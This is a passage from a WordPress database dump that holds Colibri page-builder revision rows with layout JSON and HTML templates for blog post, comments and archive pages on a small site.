"%\"}}}}}}],\"slot\":null,\"index\":1},{\"name\":\"hop-post-nav-container\",\"parentId\":\"31-m4\",\"id\":\"31-m20\",\"partialId\":31,\"styleRef\":89,\"type\":\"main\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m21\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m21\",\"index\":0,\"id\":\"31-m22\",\"partialId\":31,\"styleRef\":91,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"showPostTitle\":false,\"prevLabel\":\"Previous post\",\"postTitleLength\":\"40\",\"stateType\":\"\"}}],\"styleRef\":90,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"31-m23\",\"parentId\":\"31-m20\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-nav-button\",\"slot\":null,\"parentId\":\"31-m23\",\"index\":0,\"id\":\"31-m24\",\"partialId\":31,\"styleRef\":93,\"type\":\"main\",\"props\":{\"nextLabel\":\"Next post\",\"showPostTitle\":false,\"stateType\":\"\"}}],\"styleRef\":92,\"type\":\"main\"}],\"slot\":null,\"index\":2}],\"id\":\"31-m4\",\"parentId\":\"31-m3\",\"partialId\":31,\"styleRef\":73,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"31-m2\",\"index\":0,\"id\":\"31-m3\",\"partialId\":31,\"styleRef\":72,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Post\",\"attrs\":{\"id\":\"blog-post\"}},\"id\":\"31-m2\",\"partialId\":31,\"styleRef\":67},{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"31-m36\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":97,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"31-m37\",\"parentId\":\"31-m35\",\"partialId\":31,\"styleRef\":98,\"type\":\"main\"}],\"id\":\"31-m35\",\"parentId\":\"31-m34\",\"partialId\":31,\"styleRef\":96,\"type\":\"main\"}],\"id\":\"31-m34\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":95,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"tablet\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}},\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"id\":\"31-m31\",\"parentId\":\"31-m30\",\"partialId\":31,\"children\":[{\"name\":\"hop-post-comments\",\"slot\":null,\"parentId\":\"31-m31\",\"index\":0,\"id\":\"31-m32\",\"partialId\":31,\"styleRef\":101,\"type\":\"main\",\"props\":{\"multipleTitle\":\"{COMMENTS-COUNT} Responses\",\"avatarSize\":30,\"noneTitle\":\"No responses yet\"}},{\"name\":\"hop-post-comment-form\",\"id\":\"31-m33\",\"parentId\":\"31-m31\",\"partialId\":31,\"styleRef\":102,\"type\":\"main\"}],\"styleRef\":100,\"type\":\"main\"}],\"id\":\"31-m30\",\"parentId\":\"31-m29\",\"partialId\":31,\"styleRef\":99,\"type\":\"main\"}],\"parentId\":\"31-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Comments\",\"attrs\":{\"id\":\"comments\"}},\"id\":\"31-m29\",\"partialId\":31,\"styleRef\":94}],\"id\":\"31-m1\",\"partialId\":31,\"styleRef\":66,\"type\":\"main\"}','','','inherit','closed','closed','','32-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',32,'https://gsudice.dataconn.net/?p=77',0,'revision','',0),(78,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div data-colibri-id=\"31-m1\" class=\"style-66 style-local-31-m1 h-overflow-hidden position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m2\" id=\"blog-post\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-67 style-local-31-m2 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 colibri-dynamic-list colibri-single-post-loop style-72 style-local-31-m3 position-relative\">\n <!---->\n <div data-colibri-component=\"\" class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <!---->[colibri_loop]%5Bcolibri_item_template%5D%0A%20%20%20%20%20%20%20%20%3Cdiv%20%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-12%20h-col-md-12%20h-col-12%20%5Bcolibri_post_class%5D%20masonry-item%20style-73-outer%20style-local-31-m4-outer%22%20%20%3E%3Cdiv%20%20%20data-colibri-id=%22432-m4%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-73%20style-local-31-m4%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20%20data-colibri-id=%22432-m5%22%20class=%22colibri-post-thumbnail%20%5Bcolibri_post_thumbnail_classes%5D%20colibri-post-thumbnail-has-placeholder%20style-74%20style-local-31-m5%20h-overflow-hidden%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20%20class=%22h-global-transition-all%20colibri-post-thumbnail-shortcode%20style-dynamic-31-m5-height%22%3E%5Bcolibri_post_thumbnail%20link=%22false%22%5D%3C/div%3E%20%3Cdiv%20%20class=%22colibri-post-thumbnail-content%20align-items-lg-center%20align-items-md-center%20align-items-center%20flex-basis-100%22%3E%3Cdiv%20%20class=%22w-100%20h-y-container%22%3E%3C!----%3E%20%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m6%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-75%20style-local-31-m6%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-76-outer%20style-local-31-m7-outer%22%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m7%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-3%20h-px-md-3%20h-px-3%20v-inner-lg-3%20v-inner-md-3%20v-inner-3%20style-76%20style-local-31-m7%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m8%22%20class=%22h-blog-meta%20style-77%20style-local-31-m8%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20name=%221%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eby%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_author_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_author_content%5D%3C/a%3E%20%3Cspan%20class=%22meta-separator%22%3E%3C/span%3E%3C/div%3E%3Cdiv%20name=%222%22%20class=%22metadata-item%22%3E%3Cspan%20class=%22metadata-prefix%22%3Eon%20%3C/span%3E%20%3Ca%20href=%22%5Bcolibri_post_meta_date_url%5D%22%3E%3C!----%3E%5Bcolibri_post_meta_date_content%20date_format=%22F%20j,%20Y%22%5D%3C/a%3E%3C/div%3E%3C!----%3E%3C!----%3E%3C/div%3E%3Cdiv%20%20%20data-colibri-id=%22432-m9%22%20class=%22style-78%20style-local-31-m9%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%20colibri-post-content%22%3E%5Bcolibri_post_content%5D%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22categories_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m10%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-79%20style-local-31-m10%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-80-outer%20style-local-31-m11-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m11%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-80%20style-local-31-m11%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m12%22%20class=%22h-text%20h-text-component%20style-81%20style-local-31-m12%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ECategories:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20style-82-outer%20style-local-31-m13-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m13%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-82%20style-local-31-m13%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m14%22%20class=%22h-blog-categories%20style-83%20style-local-31-m14%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_categories%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%5Bcolibri_layout_wrapper%20name=%22tags_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m15%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-84%20style-local-31-m15%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-center%20align-items-md-center%20align-items-center%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-85-outer%20style-local-31-m16-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m16%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-85%20style-local-31-m16%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-auto%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m17%22%20class=%22h-text%20h-text-component%20style-86%20style-local-31-m17%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22%22%3E%3Cp%3ETags:%3C/p%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg%20h-col-md%20h-col%20align-self-lg-center%20align-self-md-center%20align-self-center%20style-87-outer%20style-local-31-m18-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m18%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-0%20v-inner-md-0%20v-inner-0%20style-87%20style-local-31-m18%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-center%20align-self-md-center%20align-self-center%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m19%22%20class=%22h-blog-tags%20empty-preview%20style-88%20style-local-31-m19%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_tags%20prefix=%22%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5Bcolibri_layout_wrapper%20name=%22navigation_container%22%5D%3Cdiv%20%20%20%20data-colibri-id=%22432-m20%22%20class=%22h-row-container%20gutters-row-lg-0%20gutters-row-md-0%20gutters-row-0%20gutters-row-v-lg-0%20gutters-row-v-md-0%20gutters-row-v-0%20style-89%20style-local-31-m20%20position-relative%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-row%20justify-content-lg-center%20justify-content-md-center%20justify-content-center%20align-items-lg-stretch%20align-items-md-stretch%20align-items-stretch%20gutters-col-lg-0%20gutters-col-md-0%20gutters-col-0%20gutters-col-v-lg-0%20gutters-col-v-md-0%20gutters-col-v-0%22%3E%3C!----%3E%20%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-90-outer%20style-local-31-m21-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m21%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-90%20style-local-31-m21%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m22%22%20class=%22post-nav-button%20hide-title%20style-91%20style-local-31-m22%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22prev%22%20prev_post=%22Previous%20post%22%20next_post=%22Next%20post:%22%20show_title=%22false%22%20title_length=%2240%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3Cdiv%20%20%20class=%22h-column%20h-column-container%20d-flex%20h-col-lg-auto%20h-col-md-auto%20h-col-auto%20style-92-outer%20style-local-31-m23-outer%22%20%20%20%3E%3Cdiv%20%20data-colibri-id=%22432-m23%22%20class=%22d-flex%20h-flex-basis%20h-column__inner%20h-px-lg-0%20h-px-md-0%20h-px-0%20v-inner-lg-2%20v-inner-md-2%20v-inner-2%20style-92%20style-local-31-m23%20position-relative%22%3E%3C!----%3E%3C!----%3E%20%3Cdiv%20class=%22w-100%20h-y-container%20h-column__content%20h-column__v-align%20flex-basis-100%20align-self-lg-start%20align-self-md-start%20align-self-start%22%3E%3C!----%3E%20%3Cdiv%20%20%20data-colibri-id=%22432-m24%22%20class=%22post-nav-button%20hide-title%20style-93%20style-local-31-m24%20position-relative%20h-element%22%20%20%3E%3C!----%3E%3Cdiv%20%20class=%22h-global-transition-all%22%3E%5Bcolibri_post_nav_button%20type=%22next%22%20prev_post=%22Previous%20post:%22%20next_post=%22Next%20post%22%20show_title=%22false%22%20title_length=%2230%22%5D%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%5B/colibri_layout_wrapper%5D%3C/div%3E%3C/div%3E%3C/div%3E%0A%20%20%20%20%20%20%5B/colibri_item_template%5D%0A%20%20%20%20%20%20[/colibri_loop]\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"31-m29\" id=\"comments\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-94 style-local-31-m29 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-boxed-container\">\n <!---->\n <div data-colibri-id=\"31-m30\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-99 style-local-31-m30 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-100-outer style-local-31-m31-outer\">\n <div data-colibri-id=\"31-m31\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-100 style-local-31-m31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"31-m32\" class=\"style-101 style-local-31-m32 position-relative\">\n <!---->\n <div class=\"h-global-transition-all blog-post-comments\">[colibri_post_comments none=\"No responses yet\" one=\"One response\" multiple=\"{COMMENTS-COUNT} Responses\" disabled=\"Comments are closed\" avatar_size=\"30\"]</div>\n </div>\n <div data-colibri-id=\"31-m33\" class=\"position-relative\">\n <!---->\n <div class=\"h-global-transition-all\">[colibri_post_comment_form]</div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','main_post','','inherit','closed','closed','','31-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',31,'https://gsudice.dataconn.net/?p=78',0,'revision','',0),(79,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','{\"name\":\"hop-main\",\"children\":[{\"name\":\"hop-section\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"id\":\"34-m27\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":107,\"type\":\"main\"},{\"name\":\"hop-text\",\"id\":\"34-m28\",\"parentId\":\"34-m26\",\"partialId\":34,\"styleRef\":108,\"type\":\"main\"}],\"id\":\"34-m26\",\"parentId\":\"34-m25\",\"partialId\":34,\"styleRef\":106,\"type\":\"main\"}],\"id\":\"34-m25\",\"parentId\":\"34-m2\",\"partialId\":34,\"styleRef\":105,\"type\":\"main\"}]},\"children\":[{\"name\":\"hop-archive-loop\",\"slots\":{\"item\":[{\"name\":\"hop-loop-item\",\"children\":[{\"name\":\"hop-post-thumbnail\",\"slot\":null,\"parentId\":\"34-m4\",\"index\":0,\"id\":\"34-m5\",\"partialId\":34,\"styleRef\":111,\"type\":\"main\",\"props\":{\"showPlaceholder\":false}},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"100\"}}}}},\"id\":\"34-m7\",\"parentId\":\"34-m6\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":true,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"by \"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"on \"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"at \"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"comments\"}],\"separator\":\"| \",\"showIcons\":false,\"dateFormat\":\"M j\"},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m8\",\"partialId\":34,\"styleRef\":114,\"type\":\"main\"},{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":true,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":false,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":false},\"slot\":null,\"parentId\":\"34-m7\",\"index\":1,\"id\":\"34-m9\",\"partialId\":34,\"styleRef\":115,\"type\":\"main\"},{\"name\":\"hop-post-title\",\"id\":\"34-m10\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":116,\"type\":\"main\",\"props\":{\"headingType\":\"h4\"}},{\"name\":\"hop-post-excerpt\",\"id\":\"34-m11\",\"parentId\":\"34-m7\",\"partialId\":34,\"styleRef\":117,\"type\":\"main\",\"props\":{\"maxLength\":\"16\"}}],\"styleRef\":113,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m6\",\"partialId\":34,\"styleRef\":112,\"type\":\"main\"},{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m13\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-meta\",\"props\":{\"metadata\":[{\"value\":\"author\",\"name\":\"Author\",\"check\":false,\"icon\":\"icons8-line-awesome\\/user\",\"id\":1,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"date\",\"name\":\"Date\",\"check\":false,\"icon\":\"icons8-line-awesome\\/calendar\",\"id\":2,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"time\",\"name\":\"Time\",\"check\":false,\"icon\":\"icons8-line-awesome\\/clock-o\",\"id\":3,\"prefix\":\"\",\"suffix\":\"\"},{\"value\":\"comments\",\"name\":\"Comments\",\"check\":true,\"icon\":\"icons8-line-awesome\\/comments\",\"id\":4,\"prefix\":\"\",\"suffix\":\"\"}],\"showIcons\":true,\"separator\":\"\"},\"slot\":null,\"parentId\":\"34-m13\",\"index\":0,\"id\":\"34-m14\",\"partialId\":34,\"styleRef\":120,\"type\":\"main\"}],\"styleRef\":119,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"unit\":\"%\",\"value\":\"50\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"50\"}}}}}}},\"id\":\"34-m15\",\"parentId\":\"34-m12\",\"partialId\":34,\"children\":[{\"name\":\"hop-post-read-more-group\",\"children\":[{\"name\":\"hop-post-read-more\",\"props\":{\"text\":\"read more\",\"iconName\":\"icons8-line-awesome\\/arrow-right\"},\"id\":\"34-m17\",\"parentId\":\"34-m16\",\"partialId\":34,\"styleRef\":123,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m15\",\"index\":0,\"id\":\"34-m16\",\"partialId\":34,\"styleRef\":122,\"type\":\"main\"}],\"styleRef\":121,\"type\":\"main\"}],\"slot\":null,\"parentId\":\"34-m4\",\"index\":1,\"id\":\"34-m12\",\"partialId\":34,\"styleRef\":118,\"type\":\"main\"}],\"id\":\"34-m4\",\"parentId\":\"34-m3\",\"partialId\":34,\"styleRef\":110,\"type\":\"main\"}]},\"slot\":null,\"parentId\":\"34-m2\",\"index\":0,\"id\":\"34-m3\",\"partialId\":34,\"styleRef\":109,\"type\":\"main\"},{\"name\":\"hop-post-nav-container\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m19\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m19\",\"index\":0,\"id\":\"34-m20\",\"partialId\":34,\"styleRef\":126,\"type\":\"main\",\"props\":{\"type\":\"prev\",\"prevLabel\":\"Previous\",\"stateType\":\"hover\"}}],\"styleRef\":125,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m21\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-pagination\",\"slot\":null,\"parentId\":\"34-m21\",\"index\":0,\"id\":\"34-m22\",\"partialId\":34,\"styleRef\":128,\"type\":\"main\",\"props\":{\"stateType\":\"\"}}],\"styleRef\":127,\"type\":\"main\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\",\"custom\":{\"value\":33.33,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"id\":\"34-m23\",\"parentId\":\"34-m18\",\"partialId\":34,\"children\":[{\"name\":\"hop-archive-nav-button\",\"slot\":null,\"parentId\":\"34-m23\",\"index\":0,\"id\":\"34-m24\",\"partialId\":34,\"styleRef\":130,\"type\":\"main\",\"props\":{\"stateType\":\"hover\"}}],\"styleRef\":129,\"type\":\"main\"}],\"parentId\":\"34-m2\",\"index\":1,\"id\":\"34-m18\",\"partialId\":34,\"styleRef\":124,\"type\":\"main\"}],\"parentId\":\"34-m1\",\"type\":\"main\",\"props\":{\"anchor\":false,\"name\":\"Blog Posts\",\"attrs\":{\"id\":\"blog-posts\"}},\"id\":\"34-m2\",\"partialId\":34,\"styleRef\":104}],\"id\":\"34-m1\",\"partialId\":34,\"styleRef\":103,\"type\":\"main\"}','','','inherit','closed','closed','','35-revision-v1','','','2022-02-15 15:45:52','2022-02-15 15:45:52','',35,'https://gsudice.dataconn.net/?p=79',0,'revision','',0),(80,1,'2022-02-15 15:45:52','2022-02-15 15:45:52','<div 